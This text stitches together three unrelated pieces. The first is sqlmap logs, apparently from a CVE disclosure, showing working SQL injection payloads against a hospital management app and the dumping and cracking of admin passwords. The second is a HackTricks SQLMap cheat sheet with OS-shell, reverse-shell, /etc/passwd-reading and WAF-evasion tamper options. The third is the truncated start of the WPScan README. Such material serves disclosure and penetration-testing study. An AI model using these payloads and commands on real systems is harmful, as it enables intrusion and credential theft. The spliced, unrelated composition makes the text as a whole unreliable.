[12:04:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [12:04:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:04:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:04:21] [INFO] target URL appears to have 10 columns in query [12:04:21] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable [12:04:21] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 2894=2894# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 2823 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(2823=2823,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NtWR Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 2385 FROM (SELECT(SLEEP(3)))Nuwd)-- bAsV Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706b6a71,0x54706a5a776b54714371787a617078774f7450657455496f7a614e75547177536961544c74546875,0x7170717871),NULL,NULL,NULL,NULL,NULL,NULL# --- [12:04:21] [INFO] the back-end DBMS is MySQL web application technology: PHP, PHP 8.1.2, Apache 2.4.52 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:04:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [12:04:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin' [12:04:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [12:04:21] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [12:04:21] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > Y [12:04:21] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [12:04:21] [INFO] starting dictionary-based cracking (md5_generic_passwd) [12:04:21] [INFO] starting 4 processes [12:04:35cblake12:04:35't status: 09100... |INFO] cracked password 'stupid123 ] [] [INFOINFO] current status: 09101... /] cracked password 'admin123' for user 'admin' Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [12:05:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [12:05:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 12:05:01 /2022-03-01/ SQL - Injecting for parameter 'id' in manage_admission.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 12:05:09 /2022-03-01/ [12:05:09] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=20uv7un8gs4...8s8qj5kopv'). Do you want to use those [Y/n] Y [12:05:09] [INFO] checking if the target is protected by some kind of WAF/IPS [12:05:09] [INFO] testing if the target URL content is stable [12:05:10] [INFO] target URL content is stable [12:05:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:05:10] [INFO] testing for SQL injection on GET parameter 'id' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:05:10] [WARNING] reflective value(s) found and filtering out [12:05:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [12:05:10] [INFO] testing 'Generic inline queries' [12:05:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [12:05:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' [12:05:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' [12:05:15] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [12:05:16] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="Fatal") [12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:05:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:05:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:05:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [12:05:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [12:05:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:05:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:05:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:05:16] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:05:16] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [12:05:16] [INFO] testing 'MySQL inline queries' [12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [12:05:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [12:05:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [12:05:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [12:05:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [12:05:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:05:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [12:05:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:05:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:05:31] [INFO] target URL appears to have 8 columns in query [12:05:31] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 204 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1' RLIKE (SELECT (CASE WHEN (1299=1299) THEN 1 ELSE 0x28 END))-- QynS Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 7634 FROM(SELECT COUNT(*),CONCAT(0x716b7a6b71,(SELECT (ELT(7634=7634,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vmRW Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 8229 FROM (SELECT(SLEEP(3)))Qpzi)-- hEWR Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: id=1' UNION ALL SELECT CONCAT(0x716b7a6b71,0x446147684b447641734a4e63496e494a4b67784956554b4952515543684251577076656f42487754,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- [12:05:31] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.1.2, PHP, Apache 2.4.52 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:05:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [12:05:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin' [12:05:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [12:05:31] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [12:05:31] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > Y [12:05:31] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [12:05:31] [INFO] starting dictionary-based cracking (md5_generic_passwd) [12:05:31] [INFO] starting 4 processes [12:05:37] [INFO] cracked password 'admin123' for user 'admin' [] [12:05:48INFO] [] current status: Upgra... |INFO] cracked password 'stupid123' for user 'cblake' Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [12:06:08] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [12:06:08] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 12:06:08 /2022-03-01/ SQL - Injecting for parameter 'id' in manage_room_type.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 12:06:15 /2022-03-01/ [12:06:15] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5u1m2tvs8rd...mm5ijndlgg'). Do you want to use those [Y/n] Y [12:06:15] [INFO] checking if the target is protected by some kind of WAF/IPS [12:06:15] [INFO] testing if the target URL content is stable [12:06:16] [INFO] target URL content is stable [12:06:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:06:16] [INFO] testing for SQL injection on GET parameter 'id' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:06:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:06:16] [WARNING] reflective value(s) found and filtering out [12:06:16] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Private Room with Single Patient Bed.") [12:06:16] [INFO] testing 'Generic inline queries' [12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:06:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:06:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:06:16] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [12:06:16] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [12:06:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:06:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:06:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:06:17] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [12:06:17] [INFO] testing 'MySQL inline queries' [12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [12:06:17] [WARNING] time-based comparison requires larger statistical model, please wait...... (done) [12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [12:06:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [12:06:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [12:06:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [12:06:23] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [12:06:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:06:23] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:06:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:06:23] [INFO] target URL appears to have 6 columns in query [12:06:24] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 4275=4275 AND 'Pbap'='Pbap Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 7905 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(7905=7905,1))),0x716b717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AwDy'='AwDy Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 1604 FROM (SELECT(SLEEP(3)))MPcP) AND 'bAKs'='bAKs Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=-6478' UNION ALL SELECT CONCAT(0x71626a6b71,0x616d625874694476617a78684a536b747145584d54786b47637545457570594e6e5766734f587249,0x716b717171),NULL,NULL,NULL,NULL,NULL-- - --- [12:06:24] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.52, PHP, PHP 8.1.2 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:06:24] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [12:06:24] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin' [12:06:24] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [12:06:24] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [12:06:24] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > Y [12:06:24] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [12:06:24] [INFO] starting dictionary-based cracking (md5_generic_passwd) [12:06:24] [INFO] starting 4 processes [] cracked password '12:06:30admin123] [' for user 'INFO] current status: 1teli... |admin' [cblake12:06:40's: a9243... /12:06:40] [INFO] cracked password 'stupid123' for user ' Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [12:07:03] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [12:07:03] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 12:07:03 /2022-03-01/ Happy hunting with nu11secur1ty =) ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-25003) ## More info: [href](https://www.nu11secur1ty.com/2022/03/cve-2022-25003.html)
<details> <summary><strong>Support HackTricks and get benefits!</strong></summary> Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** </details> # SQLMap - Cheetsheat ## Basic arguments for SQLmap ### Generic ```bash -u "<URL>" -p "<PARAM TO TEST>" --user-agent=SQLMAP --random-agent --threads=10 --risk=3 #MAX --level=5 #MAX --dbms="<KNOWN DB TECH>" --os="<OS>" --technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ") --batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred="<AUTH>" #HTTP authentication credentials (name:password) --proxy=http://127.0.0.1:8080 --union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char ``` ### Retrieve Information #### Internal ```bash --current-user #Get current user --is-dba #Check if current user is Admin --hostname #Get hostname --users #Get usernames od DB --passwords #Get passwords of users in DB --privileges #Get privileges ``` #### DB data ```bash --all #Retrieve everything --dump #Dump DBMS database table entries --dbs #Names of the available databases --tables #Tables of a database ( -D <DB NAME> ) --columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> ) -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column ``` ## Injection place ### From Burp/ZAP capture Capture the request and create a req.txt file ```bash sqlmap -r req.txt --current-user ``` ### GET Request Injection ```bash sqlmap -u "http://example.com/?id=1" -p id sqlmap -u "http://example.com/?id=*" -p id ``` ### POST Request Injection ```bash sqlmap -u "http://example.com" --data "username=*&password=*" ``` ### Injections in Headers and other HTTP Methods ```bash #Inside cookie sqlmap -u "http://example.com" --cookie "mycookies=*" #Inside some header sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*" sqlmap -u "http://example.com" --headers="referer:*" #PUT Method sqlmap --method=PUT -u "http://example.com" --headers="referer:*" #The injection is located at the '*' ``` ### Indicate string when injection is successful ```bash --string="string_showed_when_TRUE" ``` ### Eval **Sqlmap** allows the use of `-e` or `--eval` to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the **flask cookie session** **is signed by flask with the known secret before sending it**: ```bash sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump ``` ### Shell ```bash #Exec command python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami #Simple Shell python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell #Dropping a reverse-shell / meterpreter python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn ``` ### Read File ```bash --file-read=/etc/passwd ``` ### Crawl a website with SQLmap and auto-exploit ```bash sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3 --batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers --crawl = how deep you want to crawl a site --forms = Parse and test forms ``` ### Second Order Injection ```bash python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs ``` [**Read this post** ](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.** ## Customizing Injection ### Set a suffix ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` ### Prefix ```bash python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') " ``` ### Help finding boolean injection ```bash # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection) sqlmap -r r.txt -p id --not-string ridiculous --batch ``` ### Tamper Remember that **you can create your own tamper in python** and it's very simple. You can find a tamper example in the [Second Order Injection page here](second-order-injection-sqlmap.md). ```bash --tamper=name_of_the_tamper #In kali you can see all the tampers in /usr/share/sqlmap/tamper ``` | Tamper | Description | | ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | | apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | | apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart | | appendnullbyte.py | Appends encoded NULL byte character at the end of payload | | base64encode.py | Base64 all characters in a given payload | | between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | | bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | | chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | | commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | | commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | | concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)' | | charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | | charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022" | | charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022" | | equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' | | escapequotes.py | Slash escape quotes (' and ") | | greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | | halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | | ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | | modsecurityversioned.py | Embraces complete query with versioned comment | | modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | | multiplespaces.py | Adds multiple spaces around SQL keywords | | nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | | percentage.py | Adds a percentage sign ('%') infront of each character | | overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | | randomcase.py | Replaces each keyword character with random case value | | randomcomments.py | Add random comments to SQL keywords | | securesphere.py | Appends special crafted string | | sp\_password.py | Appends 'sp\_password' to the end of the payload for automatic obfuscation from DBMS logs | | space2comment.py | Replaces space character (' ') with comments | | space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | | space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | | space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | | space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | | space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | | space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | | space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | | space2plus.py | Replaces space character (' ') with plus ('+') | | space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | | symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and | | unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | | unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | | uppercase.py | Replaces each keyword character with upper case value 'INSERT' | | varnish.py | Append a HTTP header 'X-originating-IP' | | versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | | versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | | xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' | <details> <summary><strong>Support HackTricks and get benefits!</strong></summary> Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** </details>
<p align="center"> <a href="https://wpscan.org/"> <img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo"> </a> </p> <h3 align="center">WPScan</h3> <p align="center"> WordPress Security Scanner <br> <br> <a href="https://wpscan.com/" title="homepage" target="_blank">WPScan WordPress Vulnerability Database</a> - <a href="https://wordpress.org/plugins/wpscan/" title="wordpress security plugin" target="_blank">WordPress Security Plugin</a> </p> <p align="center"> <a href="https://badge.fury.io/rb/wpscan" target="_blank"><img src="https://badge.fury.io/rb/wpscan.svg"></a> <a href="https://github.com/wpscanteam/wpscan/actions?query=workflow%3ABuild" target="_blank"><img src="https://github.com/wpscanteam/wpscan/workflows/Build/badge.svg"></a> <a href="https://codeclimate.com/github/wpscanteam/wpscan" target="_blank"><img src="https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg"></a> </p> # INSTALL ## Prerequisites - (Optional but highly recommended: [RVM](https://rvm.io/rvm/install)) - Ruby >= 2.3 - Recommended: latest - Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see [#1283](https://github.com/wpscanteam/wpscan/issues/1283) - Curl >= 7.21 - Recommended: latest - The 7.29 has a segfault - RubyGems - Recommended: latest - Nokogiri might require packages to be installed via your package manager depending on your OS, see https://nokogiri.org/tutorials/installing_nokogiri.html ### In a Pentesting distribution When using a pentesting distubution (such as Kali Linux), it is recommended to install/update wpscan via the package manager if available. ### From RubyGems ```shell gem install wpscan ``` On MacOSX, if a ```Gem::FilePermissionError``` is raised due to the Apple's System Integrity Protection (SIP), either install RVM and install wpscan again, or run ```sudo gem install -n /usr/local/bin wpscan``` (see [#1286](https://github.com/wpscanteam/wpscan/issues/1286)) # Updating You can update the local database by using ```wpscan --update``` Updating WPScan itself is either done via ```gem update wpscan``` or the packages manager (this is quite important for distributions such as in Kali Linux: ```apt-get update && apt-get upgrade```) depending how WPScan was (pre)installed # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` Enumerating usernames ```shell docker run -it --rm 